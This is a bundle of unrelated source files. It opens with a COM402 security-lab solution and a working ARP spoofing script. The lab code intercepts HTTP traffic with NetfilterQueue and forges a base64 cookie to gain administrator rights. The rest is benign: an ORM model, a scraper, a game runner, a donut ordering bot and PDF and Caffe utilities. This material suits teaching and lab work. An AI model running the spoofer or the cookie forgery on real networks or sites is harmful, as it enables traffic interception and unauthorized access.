This enables raw packets to be collected\n\t\t\t\t\t\t\t\t\t\t\t\t\t # and processed by the exercise3_call_back_function\n\n\ttry:\n\t\tnfqueue.run() # run nfqueue in try catch block\n\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\n\n\tnfqueue.unbind() # unbind nfqueue\n\tsys.exit(0)\n\ndef exercise4_call_back_function(pkt):\n\n\t'''\n\tThis function is used by the exercise 4 function below\n\tto get the ip packets from raw payload.\n\tThe exercise4 function recursively runs this function to solve \n\texercise 4\n\n\tAs part of the analysis the output of the print is piped to\n\ta text file and the sensitive data is carefully spotted.\n\n\n\n\tInput : the intercepted raw payload\n\tOutput: The token and staus code\n\t'''\n\t\n\turl = 'http://com402.epfl.ch/hw1/ex4/sensitive' # This is the url which we will use with request\n\t\n\tpkt.accept() # accept raw packet\n\tpayload = pkt.get_payload() # get the payload of raw packet\n\t#print(k)\n\tip = IP(payload) # create an ip packet\n\t\n\n\n\tif ip.haslayer(TCP) == True and ip[TCP].dport == 80:\n\t\t\tassert ip[TCP].dport == 80;\n\t\t\tif ip.haslayer(Raw):\n\t\t\t\t#print (ip[Raw])\n\t\t\t\thttp = ip[Raw].load.decode();\n\t\t\t\t#print(http.lstrip(' ')) # uncomment this to see the output. One possibility is to pipe the output to text file when this is uncommented\n\t\t\t\t# this enables carful reading of sensitive information\n\n\t# we create the new json file for the payload/sensitive data and header\n\tdata = {\"student_email\":\"lukman.olagoke@epfl.ch\",\"secrets\": [\"5370/2586/7638/8964\",\"0470.5684.7704.8295\",\"7968/7126/0501/8790\",\"W;PGR5E@SU1X>\",\"=X5AN>?YN419PA\"]}\n\n\theader = {\"User-Agent\":\"Dumb Generator\",\"Host\":\"com402.epfl.ch\",\"Content-Type\":\"application/json\",\"Content-Length\":\"452\"}\n\n\t# post a request using payload and headr\n\ttry :\n\t\tr = requests.post(url, data=json.dumps(data),headers=header)\n\t\t# The new response is provided as response below\n\t\tprint (\"The token response: \")\n\t\tprint (r.text)\n\t# We verify the status code is 200 = okay\n\t\tprint(\"\\n The status code: \")\n\t\tprint (r.status_code)\n\n\t\tprint (\"\\n\")\n\texcept KeyboardInterrupt:\n\t\t pass\n\ndef exercise4():\n\n\t'''\n\tThis function recursively calls the exercise4_call_back_function.\n\tIt makes ise of the NetFilterQueue.\n\n\n\t'''\n\n\tnsfqueue = NetfilterQueue() # create instance of NFQUEUE-- NetfilterQueue provides access to packets matched by an iptables rule in Linux\n\tnsfqueue.bind(0, exercise4_call_back_function, 100) # bind nfqueue to function exercise3_call_back_function. 
This enables raw packets to be collected\n\t\t\t\t\t\t\t\t\t\t\t\t\t # and processed by the exercise3_call_back_function\n\n\ttry:\n\t\tnsfqueue.run() # run nfqueue in try catch block\n\n\texcept KeyboardInterrupt:\n\t\t sys.exit(0)\n\t\t#print('') # exception\n\tnsfqueue.unbind() # unbind nfqueue\n\tsys.exit(0)\n\n\n\n\n\n\n\n\n################################ EXERCISE ONE ######################################################################\n'''\nInspecting the web page http://com402.epfl.ch/hw1/ex1, we observed that encryption was done on the client side.\n\nIn particular the dunction below does the encryption:\n\n\n\nfunction superencryption(msg,key) {\n if (key.length < msg.length) {\n var diff = msg.length - key.length;\n key += key.substring(0,diff);\n }\n\n var amsg = msg.split(\"\").map(ascii);\n var akey = key.substring(0,msg.length).split(\"\").map(ascii);\n return btoa(amsg.map(function(v,i) {\n return v ^ akey[i];\n }).map(toChar).join(\"\"));\n }\n\n\n\nMore strangely, msg = my email address = lukman.olagoke@epfl.ch and key =secureOneTimePad =Never send a human to do a machine's job\".\nThere we can run the function superencryption(msg,key) from the web console as below:\n\n>>>>>>> superencryption(\"lukman.olagoke@epfl.ch\",\"Never send a human to do a machine's job\")\nThis gives : \n>>>>>>> \"IhAdCBNOXQoCBUcOSw01CBEITFoMSA==\"\nWhich is the password to use on the webpage to enable login and get token\n>>>>>>\n\n\n\n'''\n\n\n\n\n\ndef ex2_cookies():\n cookie = 'bHVrbWFuLm9sYWdva2VAZXBmbC5jaCwxNTIwNDM3OTk2LGNvbTQwMixodzEsZXgxLHVzZXI='\n decoded = base64.b64decode(cookie)\n print(\"\\nMy cookie is \" + cookie)\n\n print(\"\\nMy decoded cookie is: \\n\")\n print(decoded)\n \n print (\"\\nChange user to administrator in the cookie decode and encode again...\");\n\n # cookie decoded is b'lukman.olagoke@epfl.ch,1520437996,com402,hw1,ex1,user'\n # change user to administrator. 
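# A minimal Python sketch of the exercise-1 "superencryption" described above
# (repeating-key XOR, then base64), assuming an ASCII message and key; the
# JavaScript version only extends the key once, so the two would differ on
# messages longer than twice the key.  Arguments below are placeholders.
import base64
from itertools import cycle

def superencryption(msg, key):
    xored = bytes(ord(m) ^ ord(k) for m, k in zip(msg, cycle(key)))
    return base64.b64encode(xored).decode()

# e.g. superencryption("some message", "some key") -> base64 of the XOR stream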
This becomes new cookie\n\n newCookie = b'lukman.olagoke@epfl.ch,1520437996,com402,hw1,ex1,administrator'\n print (\"\\nNew Cookie is:\" + str(newCookie))\n\n\n # Encode the new cookie and replace cookie with new cookie on browser\n print (\"\\nEncode new Cookie to get : \");\n encoded = base64.b64encode(newCookie)\n\n print(encoded)\n\n # encoded = \"bHVrbWFuLm9sYWdva2VAZXBmbC5jaCwxNTIwNDM5MTAzLGNvbTQwMixodzEsZXgxLGFkbWluaXN0cmF0b3I=\"\n\n # use the new encoded cookie in the browser \n\n\n\n\n\n","repo_name":"adderbyte/InfoPrivacy_BigData_Lab","sub_path":"Lab1_solution/interceptor.py","file_name":"interceptor.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24288673920","text":"import sys\nimport time\nimport scapy.all as scapy\nfrom optparse import *\n\"\"\"\nop = set to the ARP response, 1 = request\npdst = victim IP addr\nhwdst = victim MAC\npsrc = set the packet source IP to gateway IP addr\n\"\"\"\n\ndef get_args():\n parser = OptionParser()\n parser.add_option(\"-t\", \"--target\",help=\"define the target IP\", dest=\"target_ip\")\n parser.add_option(\"-g\", \"--gateway\",help=\"define the gateway IP\", dest=\"gateway_ip\")\n (options, args) = parser.parse_args()\n if not options.target_ip:\n parser.error(\"please specify the target ip\")\n elif not options.gateway_ip:\n parser.error(\"please specify the gateway ip\")\n else:\n return options\n\n\ndef get_mac(ip):\n arp_request = scapy.ARP(pdst=ip)\n # print(arp_request.summary())\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n # print(broadcast.summary())\n arp_broadcast = broadcast/arp_request\n # arp_broadcast.show()\n ans_list = scapy.srp(arp_broadcast, timeout=1, verbose=False)[0]\n return ans_list[0][1].hwsrc\n\n\n\"\"\"\nprint(packet.show())\nprint(packet.summary())\nsummarize the packet generate above\n\"\"\"\n\n\ndef spoof(target_ip, spoof_ip,):\n target_mac = get_mac(target_ip)\n packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)\n scapy.send(packet, verbose=False) # command change the default gateway IP to attacker MAC addr\n\n\ndef restore(dst_ip, src_ip):\n packet = scapy.ARP(op=2, pdst=dst_ip, hwdst=get_mac(dst_ip), psrc=src_ip, hwsrc=get_mac(src_ip))\n scapy.send(packet, verbose=False)\n\n\ni = 0\nkeep_looping = True\noptions = get_args()\ntry:\n while keep_looping:\n spoof(options.target_ip, options.gateway_ip)\n spoof(options.gateway_ip, options.target_ip)\n i += 2\n print(f\"\\rsending the {i} packets\", end=\"\")\n sys.stdout.flush()\n time.sleep(2)\nexcept KeyboardInterrupt:\n print(\"\\n[+] Detected CTRL + C ... 
Quitting.\\n\"\n \"reset the ARP table...\")\n restore(options.target_ip, options.gateway_ip)\n restore( options.gateway_ip, options.target_ip)\n\n\n","repo_name":"EEthanZZ/Hacking_Python","sub_path":"arp_spoofing.py","file_name":"arp_spoofing.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43241321576","text":"from __future__ import annotations\n\nimport typing\nimport uuid\n\nfrom tortoise import fields, models\n\nfrom guarantor.enums import Currency, DealStatus, DealType\n\nif typing.TYPE_CHECKING:\n from guarantor.db.models.dispute import Dispute\n from guarantor.db.models.user import User\n\n\nclass Deal(models.Model):\n id = fields.IntField(pk=True)\n\n title = fields.CharField(max_length=128)\n description = fields.TextField()\n\n price = fields.FloatField()\n currency = fields.CharEnumField(Currency, default=Currency.USDT)\n status = fields.CharEnumField(DealStatus, default=DealStatus.CREATED)\n deal_type = fields.CharEnumField(DealType, default=DealType.COMMON)\n\n chat_id = fields.UUIDField(default=uuid.uuid4)\n\n customer: fields.ForeignKeyRelation[User] = fields.ForeignKeyField(\n \"models.User\",\n related_name=\"deals_as_customer\",\n )\n performer: fields.ForeignKeyRelation[User] = fields.ForeignKeyField(\n \"models.User\",\n related_name=\"deals_as_performer\",\n )\n\n deadline_at = fields.DatetimeField(default=None, null=True)\n created_at = fields.DatetimeField(auto_now_add=True)\n\n dispute: fields.ReverseRelation[Dispute]\n\n class Meta:\n table = \"deals\"\n","repo_name":"ilyagod/guarantor","sub_path":"guarantor/db/models/deal.py","file_name":"deal.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12388885823","text":"from bs4 import BeautifulSoup\nimport requests\n# 发送请求\nbase_url = 'http://www.itxdl.cn/activity/teacher/teacher_lieibiao/'\nresponse = requests.get(base_url)\nresponse.encoding = response.apparent_encoding\n\nif response.status_code == 200:\n html = response.text\n # 构建bs4对象\n html = BeautifulSoup(html,'lxml')\n # 先查找到老师信息大的模块\n teacher_list = html.select('div.php_jiangshi_liebiao')\n with open('teacher.csv','w',encoding='utf-8') as f:\n for teacher in teacher_list:\n # 提取每个模块里面的一条条信息 并写入文件\n name = teacher.select('h1')[0].text.strip()\n info = teacher.select('p')[0].text\n img = teacher.select('img')[0]['src']\n item = [name,info,img]\n f.write(','.join(item)+'\\n')","repo_name":"theme716/small-routine","sub_path":"insect/6.six_day/2.兄弟连老师_bs4练习.py","file_name":"2.兄弟连老师_bs4练习.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1445341800","text":"# for all in baselines\nimport os\nimport subprocess\n\nresult = []\nos.system(\"make clean\")\nos.system(\"make\")\nfiles = [file for file in os.listdir('./contest')]\nfor i in range(len(files)):\n for j in range(i + 1, len(files)):\n player1 = files[i]\n player2 = files[j]\n print(f'\\n=== Testing {player1} vs {player2} ===')\n output = subprocess.check_output([\n # '/bin/echo',\n './build/main',\n f\"./contest/{player1}\",\n f\"./contest/{player2}\"\n ]).decode(\"utf-8\")\n if \"Player1 wins\" in output:\n result.append((player1, player2, f\"{player1}贏了 {player2}輸了\"))\n print(f\"{player1}贏了 {player2}輸了\")\n elif \"Draw\" in output:\n result.append((player1, player2, f\"{player1} {player2}平手\"))\n 
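# A minimal sketch of writing the scraped teacher rows with the csv module, so a
# comma inside a name or bio gets quoted instead of corrupting the line.  The
# function name is illustrative; rows would be the [name, info, img] lists built above.
import csv

def write_rows(path, rows):
    with open(path, "w", encoding="utf-8", newline="") as f:
        csv.writer(f).writerows(rows)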
print(f\"{player1} {player2}平手\")\n else:\n result.append((player1, player2, f\"{player2}贏了 {player1}輸了\"))\n print(f\"{player2}贏了 {player1}輸了\")\n print()\n\n print(f'\\n=== Testing {player2} vs {player1} ===')\n output = subprocess.check_output([\n # '/bin/echo',\n './build/main',\n f\"./contest/{player2}\",\n f\"./contest/{player1}\"\n ]).decode(\"utf-8\")\n if \"Player1 wins\" in output:\n result.append((player2, player1, f\"{player2}贏了 {player1}輸了\"))\n print(f\"{player2}贏了 {player1}輸了\")\n elif \"Draw\" in output:\n result.append((player2, player1, f\"{player2} {player1}平手\"))\n print(f\"{player2} {player1}平手\")\n else:\n result.append((player2, player1, f\"{player1}贏了 {player2}輸了\"))\n print(f\"{player1}贏了 {player2}輸了\")\n print()\n\nprint('\\n=== Result ===')\nwith open(\"gamelog.txt\", \"a\") as file:\n counter = 0\n for r in sorted(result, key=lambda x: (x[0], x[1])):\n print(f'{r[0]} vs {r[1]}: {r[2]}')\n file.write(f'{r[0]} vs {r[1]}: {r[2]}\\n')\n counter += 1\n if counter % 4 == 0:\n print()\n file.write(f'\\n')\n","repo_name":"hsuan1117/I2P2-MiniChess","sub_path":"contest.py","file_name":"contest.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28714646389","text":"# Donut Bot\n# Bugs - Phone Number allows letters\n# - Name allows numbers\n# Different types of modules being imported into the code\nimport sys\n# - Importing the module of sys which is a module\n# that provides access to some objects used or\n# maintained by the interpreter\nimport random\n# - Importing the module of random which is a\n# module that is used to generate random things\nfrom random import randint\n# - From the module of random,\n# it imports the module of randint\n# which returns an integer number from a\n# specified range of numbers\n\n\n# - List of random names used at the beginning of\n# the code when starting the program and the welcome message appears\nnames = [\"Mark\", \"Phoebe\", \"Michael\", \"Denise\", \"Ellen\", \"Eric\", \"Lewis\", \"Lana\", \"Moana\", \"Sally\"]\n\n# List of donut names\n# These donut names are the different products that the\n# store has to offer for sale\ndonut_names = ['Powdered', 'Jelly', 'Strawberry Frosted', 'Blueberry Glazed',\n 'Chocolate Frosted', 'Bavarian Cream', 'Maple Frosted', 'French Cruller',\n 'Glazed', 'Apple Fritter', 'Chocolate Glazed', 'Boston Kreme']\n\n# - List of donut prices.\n# These are the prices for the different donuts\n# the store has to offer for sale\ndonut_prices = [3.50, 4.00, 4.00, 3.00, 2.50, 3.50, 5.00, 4.50, 3.00, 2.00, 4.50, 5.00]\n\n# - list to store ordered donuts. When ordering the donuts,\n# the program will append all the names of the donuts\n# which are ordered\norder_list = []\n\n# - list to store donut prices. 
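# A minimal sketch of the contest pairings with itertools: permutations(files, 2)
# yields every ordered (player1, player2) pair exactly once, which is what the
# nested index loops above play across their two subprocess calls.
import itertools

def all_matchups(files):
    return list(itertools.permutations(files, 2))

# all_matchups(["a", "b", "c"])
# -> [("a","b"), ("a","c"), ("b","a"), ("b","c"), ("c","a"), ("c","b")]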
When ordering the donuts,\n# the program will append all the costs of the donuts\n# which are ordered\norder_cost = []\n\n# - Customer details dictionary - Is a dictionary (a list)\n# which can hold customer details and has a variable name.\n# It allows the user to take information out more easily\ncustomer_details = {}\n\n# Validates inputs to check they are not blank\ndef not_blank(question):\n valid = False\n while not valid:\n response = input(question)\n if response != \"\":\n return response\n else:\n print(\"This cannot be blank\")\n \n\n# validates inputs to check if they an integer\n# takes low, high and question as parameters\n# returns input if the integer is valid\ndef val_int(low, high, question):\n while True:\n # sets up while loop\n try:\n # - the program will print the statement\n # (question) which is asking for an input\n num = int(input(question))\n # asks for input(integer)\n if num >= low and num <= high:\n # - if num is inside or equal\n # to the one of the numberic\n # boundaries, it will return num.\n return num\n else:\n # - if num is outside of the numeric boundaries\n # an error message\n print(f\"Please enter a number between {low} and {high}.\")\n except ValueError:\n # - if the input is not an integer it will go to the\n # except code and print an error message followed\n # by an instruction\n print (\"That is not a valid number.\")\n # Error Print Statement\n print(f\"Please enter a number between {low} and {high}.\")\n # Instruction print statement\n \n \n# validates string inputs to check if they are a string\n# takes question as parameter\n# returns response in title class if valid\ndef check_string(question):\n while True:\n # sets up while true loop\n response = input(question)\n # asks for input(string)\n x = response.isalpha()\n # - checks that the input is in alphabetical\n # and sets x to True if alpha\n if x is False:\n # if x is False prints error message\n print(\"Input must only contain letters.\")\n else:\n return response.title()\n # if True returns response in title class\n\n\n# Validates phone number to check if it is between 7 to 10 digits\n# takes low, high and question as parameters\n# returns input if the input is an integer and has 7 to 10 digits\ndef check_phone(question, PH_LOW, PH_HIGH):\n while True:\n # sets up while loop\n try:\n # - the program will print the statement\n # (question) which is asking for an input\n num = int(input(question))\n # asks for input(integer)\n test_num = num\n # - sets test_number to equal number which\n # allows program to pull apart the number\n # which is inputted to make sure it is a number\n count = 0\n while test_num > 0:\n # - starts another while loop where\n # test_num is bigger than 0\n test_num = test_num//10\n # - test_num is being divided by 10 to\n # split up the number\n count = count + 1\n # - since count is equal to 0,\n # every digit will be\n # counted to check the number of\n # digits that have been entered\n if count >= PH_LOW and count <= PH_HIGH:\n # - if count is inside or equal\n # to one of the numeric boundaries,\n # it will return num.\n return num\n else:\n # - if num is outside of the numeric\n # boundaries an error message\n print(\"NZ phone numbers have between 7 and 10 digits\")\n except ValueError:\n # - if the input is not an integer it will go\n # to the except code and print an error\n # message followed by an instrction\n print (\"That is not a valid number.\")\n # Error Print Statement\n print(\"Please enter a number.\")\n # Instruction print statement\n\n# 
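# A minimal string-based alternative to check_phone() above: converting the input
# to int and counting digits with //10 drops a leading 0 (e.g. "0123456" counts as
# only 6 digits), whereas a length check on the raw string does not.  The function
# name and defaults are illustrative.
def check_phone_str(question, low=7, high=10):
    while True:
        s = input(question).strip()
        if s.isdigit() and low <= len(s) <= high:
            return s
        print(f"NZ phone numbers have between {low} and {high} digits")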
Generates message with a random name\n# from the list called names and prints it out\n# No Parameters\n# No Returns\n\n\ndef welcome():\n '''\n Purpose: To generate a random name form the list and print out\n a welcome message\n Parameters: None\n Returns: None\n '''\n num = randint(0, 9)\n # - setting num to randint which returns\n # an integer number from a specified range\n # of numbers, 0 to 9 in this case\n name = (names[num])\n # - setting name to equal the list of names at the index of\n # the random numbers. Each word in a list has an index\n # number with the first one starting with 0 unless specified\n print()\n # prints blank space\n print(\"***Welcome to Dream Donut***\")\n # Print statement welcoming user to online shop with help of bot\n print(\"***My name is\", name, \"****\")\n # - Print statement which introduces the person\n # helping including the random name\n print(\"*** I will be here to help you order your delicious dream donut ***\")\n # Print statement stating what the program will help you achieve\n print()\n # prints blank space\n\n\n\n\n# Creates the option to choose either pickup or delivery\n# takes in Low, High and question as parameters when\n# sending to the validate integer input function\n# returns del_pick information at the end of the function\ndef order_type():\n del_pick = 0\n # Sets del_pick to empty\n LOW = 1\n HIGH = 2\n question = f\"Enter a number between {LOW} and {HIGH}: \"\n # - The question which asks if the user type in 1 or 2\n # depending on if they want delivery or pickup\n print(\"Is your order for Click and collect or delivery?\")\n # - Print statement which informs customer\n # they are going to have to choose between delivery and pickup\n print(\"For Click and Collect please enter 1\")\n print(\"For Delivery please enter 2\")\n delivery = val_int(LOW, HIGH, question)\n # - sets delivery to equal validate input which sends\n # input through the function of validate input which\n # checks if the input is an integer and if it fits in\n # the numeric boundaries set by low and high\n if delivery == 1:\n # If Delivery is equal to 1\n print(\"Click and Collect\")\n # - Prints statement stating Click and collect\n # to show you have chosen click and collect\n del_pick = \"click and collect\"\n # - sets del_pick to equal click and collect\n # (will be used in the order print statement function)\n click_and_collect_info()\n # Opens and runs the function called click and collect info\n else:\n # if delivery is the other option, 2\n print(\"Delivery\")\n # - Prints statement stating\n # Delivery to show you have chosen Delivery\n del_pick = \"delivery\"\n # - sets del_pick to equal\n # delivery (will be used in the order print statement function)\n delivery_info()\n # Opens and runs the function called delivery info\n return del_pick\n # returns del_pick information back to del_pick\n\n\n# Click and collect information\ndef click_and_collect_info():\n question = \"Please enter your name: \"\n customer_details['name'] = check_string(question)\n print(customer_details['name'])\n\n question = \"Please enter your phone number: \"\n customer_details['phone'] = check_phone(question, 7, 10)\n print(customer_details['phone'])\n print(customer_details)\n print()\n\n\n# Delivery information\ndef delivery_info():\n question = \"Please enter your name: \"\n customer_details['name'] = check_string(question)\n print(customer_details['name'])\n\n question = \"Please enter your phone number: \"\n customer_details['phone'] = check_phone(question, 7, 10)\n 
print(customer_details['phone'])\n\n question = \"Please enter your house number: \"\n customer_details['house'] = not_blank(question)\n print(customer_details['house'])\n\n question = \"Please enter your street name: \"\n customer_details['street'] = check_string(question)\n print(customer_details['street'])\n\n question = \"Please enter your suburb: \"\n customer_details['suburb'] = check_string(question)\n print(customer_details['suburb'])\n print(customer_details)\n print()\n\n#donut list\ndef donut_list():\n number_donuts = 12\n for count in range (number_donuts):\n print(\"{} {} ${:.2f}\" .format(count + 1, donut_names[count], donut_prices[count]))\n\n\n# Choose total Number of donuts - max 20\n# donut order - from menu - print each donut ordered with cost\ndef order_donuts():\n # ask for total number of pizzas for order\n num_donuts = 0\n LOW = 1\n HIGH = 20\n MENU_LOW = 1\n MENU_HIGH = 12\n question = (f\"Enter a number between {LOW} and {HIGH} \") \n print(\"How many donuts do you want to order? \")\n num_donuts = val_int(LOW, HIGH, question)\n #choose donut from menu\n for item in range(num_donuts):\n while num_donuts > 0:\n print(\"Please choose your donuts by entering the\"\n \"number from the menu \")\n question = (f\"Enter a number between {MENU_LOW} and {MENU_HIGH} \") \n donut_ordered = val_int(MENU_LOW, MENU_HIGH, question)\n donut_ordered = donut_ordered -1\n order_list.append(donut_names[donut_ordered])\n order_cost.append(donut_prices[donut_ordered])\n print(\"{} ${:.2f}\" .format(donut_names[donut_ordered],donut_prices[donut_ordered]))\n num_donuts = num_donuts-1\n\n#print order out- including if order is del or pick up and names and price of each pizza - total cost including any delivery charge\n\ndef print_order(del_pick):\n print()\n total_cost = sum(order_cost)\n print (\"Customer Details:\")\n if del_pick ==\"click and collect\":\n print(\"Your order is for Click and Collect\")\n print(f\"Customer Name: {customer_details['name']} \\nCustomer Phone: {customer_details['phone']}\")\n elif del_pick == \"delivery\":\n print(\"Your order is for Delivery\")\n print(f\"Customer Name: {customer_details['name']} \\nCustomer Phone: {customer_details['phone']} \\nCustomer Address: {customer_details['house']} {customer_details['street']} {customer_details['suburb']}\")\n print()\n print(\"Your Order Details\")\n count = 0\n for item in order_list:\n print(\"Ordered: {} Cost ${:.2f}\" .format(item, order_cost[count]))\n count = count+1\n print()\n if del_pick == \"delivery\":\n if len(order_list) >= 5:\n print(\"Your order will be delivered to you for free\")\n elif len(order_list) <5:\n print(\"Due to the fact that you have ordered less than 5 items, there is a $9.00 surcharge for delivery\")\n total_cost = total_cost +9\n print(\"Total Order Cost\")\n print(f\"${total_cost:.2f}\")\n\n\n\n#ability to cancel or proceed with order\ndef confirm_cancel(): \n LOW = 1\n HIGH = 2\n question = (f\"Enter a number between {LOW} and {HIGH} \") \n print (\"Please Confirm Your Order\")\n print (\"To confirm please enter 1\")\n print (\"To cancel please enter 2\")\n confirm = val_int(LOW, HIGH, question)\n if confirm == 1:\n print (\"Order Confirmed\")\n print (\"Your order has been sent to our kitchen\")\n print (\"Your delicious donut will be with you shortly\")\n new_exit() \n elif confirm == 2:\n print (\"Your Order has been Cancelled\")\n print (\"You can restart your order or exit the BOT\")\n new_exit() \n#option for new order or to exit\ndef new_exit():\n LOW = 1\n HIGH = 2\n 
question = (f\"Enter a number between {LOW} and {HIGH} \") \n print (\"Do you want to start another Order or exit?\")\n print (\"To start another order please enter 1 \")\n print (\"To exit the BOT please enter 2 \")\n confirm = val_int(LOW, HIGH, question)\n if confirm == 1:\n print (\"New Order\")\n order_list.clear()\n order_cost.clear()\n customer_details.clear() \n main()\n elif confirm == 2:\n print (\"Exit\")\n order_list.clear()\n order_cost.clear()\n customer_details.clear() \n sys.exit()\n\n#main function\ndef main():\n '''\n Purpose: To run all functions\n A welcome message\n Parameters: none\n Returns: None\n '''\n welcome()\n del_pick = order_type()\n donut_list()\n order_donuts()\n print_order(del_pick)\n confirm_cancel()\n \nmain()\n\n","repo_name":"Ja5onChen/DONUT_BOT","sub_path":"Components/testing v1.py","file_name":"testing v1.py","file_ext":"py","file_size_in_byte":14338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11679635042","text":"import os\nimport sys\nfrom pypdf import PdfReader, PdfWriter\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter\nimport io\n\n# 入力ファイルの取得\nif len(sys.argv) != 2:\n print('Usage: python main.py ')\n sys.exit()\n\ninput_file = sys.argv[1]\noutput_file = os.path.splitext(input_file)[0] + '_add_meta.pdf'\n\n# 元のPDFを開く\nexisting_pdf = PdfReader(open(input_file, \"rb\"))\n\n# 出力先\noutput = PdfWriter()\n\n# ページの幅と高さを取得します\nwidth = existing_pdf.pages[0].mediabox[2]\nwidth = int(width)\nheight = existing_pdf.pages[0].mediabox[3]\nheight = int(height)\n\n# 新しいPDF (canvas) を作成\npacket = io.BytesIO()\ncan = canvas.Canvas(packet, pagesize=(width, height))\n\n# マージンを設定します。\nmargin_x = 50\nmargin_y = 50\n\n# x軸とy軸を描画します。\ncan.line(margin_x, margin_y, width, margin_y) # x-axis\n# 青色の線に変更します\ncan.setStrokeColorRGB(0, 0, 1)\ncan.line(margin_x, margin_y, margin_x, height) # y-axis\n\n# x軸とy軸にラベルを追加します。\ncan.drawString(margin_x, margin_y - 20, f\"Width: {width} points\") # X axis label\ncan.drawString(margin_x - 30, margin_y, f\"Height: {height} points\") # Y axis label\n\ncan.save()\n\n# 新しく作成したPDF (canvas) を移動\npacket.seek(0)\nnew_pdf = PdfReader(packet)\n\n# 元のPDFのページ数分ループして新しいPDFに書き込む\nfor i in range(len(existing_pdf.pages)):\n page = existing_pdf.pages[i]\n print(f\"Page {i + 1} rotation: {page.rotation}\")\n print(f\"Page {i + 1} mediabox: {page.mediabox}\")\n print(f\"Page {i + 1} cropbox: {page.cropbox}\")\n page.transfer_rotation_to_content()\n print(f\"Page {i + 1} rotation: {page.rotation}\")\n print(f\"Page {i + 1} mediabox: {page.mediabox}\")\n print(f\"Page {i + 1} cropbox: {page.cropbox}\")\n page.merge_page(new_pdf.pages[0])\n output.add_page(page)\n\n\n# 新しいPDFを保存\nwith open(output_file, \"wb\") as f:\n output.write(f)\n\nwith open(\"hoge.pdf\", \"wb\") as f:\n hoge_pdf = PdfWriter()\n hoge_pdf.add_page(new_pdf.pages[0])\n hoge_pdf.write(f)\n","repo_name":"nnashiki/analyze-iregular-pdf","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1917353414","text":"#!/usr/bin/python2.7 \n# -*- coding: utf-8 -*- \n \n\n\n\n#(1) string array 내부 문자열에 대해 쌍따옴표 적용\n#(3) field 타입(정수형, 실수형)에 따라 number literal 적���하게 적용\n#(4) field value가 문자열이 아닌 타입의 경우 쌍따옴표 제거\n#(5) 일부 enumeration 문자열 타입 불일치 (xavier -> Xavier, MAX -> Max 등...)\n#(6) Solver 정보 추가\n\n#(2) Conv Layer, filterDim.channels 적용\n\n\nimport argparse \nimport os 
\nimport sys \nimport json\n\nimport pdb\nimport pudb\n\nfrom collections import OrderedDict\n \n\nLAYER_PROP_DEF = os.path.join(os.environ['LAONSILL_DEV_HOME'], 'src/prop/layerPropDef.json')\nNETWORK_PROP_DEF = os.path.join(os.environ['LAONSILL_DEV_HOME'], 'src/prop/networkPropDef.json')\nOBJ_START = '{'\nOBJ_END = '}'\nLIST_START = '['\nLIST_END = ']'\nLIST_DELEM = '^'\n\nINNER_ID_START = 10000\n\n\nskip_layers = set([\n])\n\n\nlist_item = set([\n 'bottom',\n 'top',\n 'param',\n 'dim',\n 'xxxxxxxxxxxxxxxxxxxxxxx'\n])\n\nlayer_convert_dict = OrderedDict({\n 'Data': 'DataInput',\n 'Input': 'DataInput',\n 'Convolution': 'Conv',\n 'Pooling': 'Pooling',\n 'InnerProduct': 'FullyConnected',\n 'ReLU': 'Relu',\n 'Softmax': 'Softmax',\n 'BatchNorm': 'BatchNorm3',\n 'Scale': 'Scale',\n 'Concat': 'Concat',\n 'SoftmaxWithLoss': 'SoftmaxWithLoss',\n 'Eltwise': 'ElementWise',\n 'Dropout': 'DropOut',\n 'xxxxxxxxxxxxxxxxxxxxxxx': ''\n})\n\ncommon_dict = OrderedDict({\n 'name': 'name',\n 'type': 'layer',\n 'bottom': 'input',\n 'top': 'output',\n 'xxxxxxxxxxxxxxxxxxxxxxx': ''\n})\n\nconvolution_dict = OrderedDict({\n 'param' + LIST_DELEM + '0': OrderedDict({\n 'lr_mult': 'weightUpdateParam.lr_mult',\n 'decay_mult': 'weightUpdateParam.decay_mult'\n }),\n 'param' + LIST_DELEM + '1': OrderedDict({\n 'lr_mult': 'biasUpdateParam.lr_mult',\n 'decay_mult': 'biasUpdateParam.decay_mult'\n }),\n 'convolution_param': OrderedDict({\n 'num_output': 'filterDim.filters',\n 'kernel_size': ['filterDim.rows', 'filterDim.cols'],\n 'stride': 'filterDim.stride',\n 'pad': 'filterDim.pad',\n 'weight_filler': OrderedDict({\n 'type': 'weightFiller.type',\n 'value': 'weightFiller.value',\n 'mean': 'weightFiller.mean',\n 'std': 'weightFiller.std'\n }),\n 'bias_filler': OrderedDict({\n 'type': 'biasFiller.type',\n 'value': 'biasFiller.value',\n 'mean': 'biasFiller.mean',\n 'std': 'biasFiller.std'\n }),\n 'bias_term': 'biasTerm',\n 'kernel_h': 'filterDim.rows',\n 'kernel_w': 'filterDim.cols',\n 'pad_h': 'filterDim.pad_h',\n 'pad_w': 'filterDim.pad_w'\n })\n})\n\npooling_dict = OrderedDict({\n 'pooling_param': OrderedDict({\n 'pool': 'poolingType',\n 'kernel_size': ['poolDim.rows', 'poolDim.cols'],\n 'stride': 'poolDim.stride',\n 'pad': 'poolDim.pad',\n 'global_pooling' : 'globalPooling'\n })\n\n})\n\ndropout_dict = OrderedDict({\n 'dropout_param': OrderedDict({\n 'dropout_ratio': 'probability'\n })\n})\n\ninnerproduct_dict = OrderedDict({\n 'param' + LIST_DELEM + '0': OrderedDict({\n 'lr_mult': 'weightUpdateParam.lr_mult',\n 'decay_mult': 'weightUpdateParam.decay_mult'\n 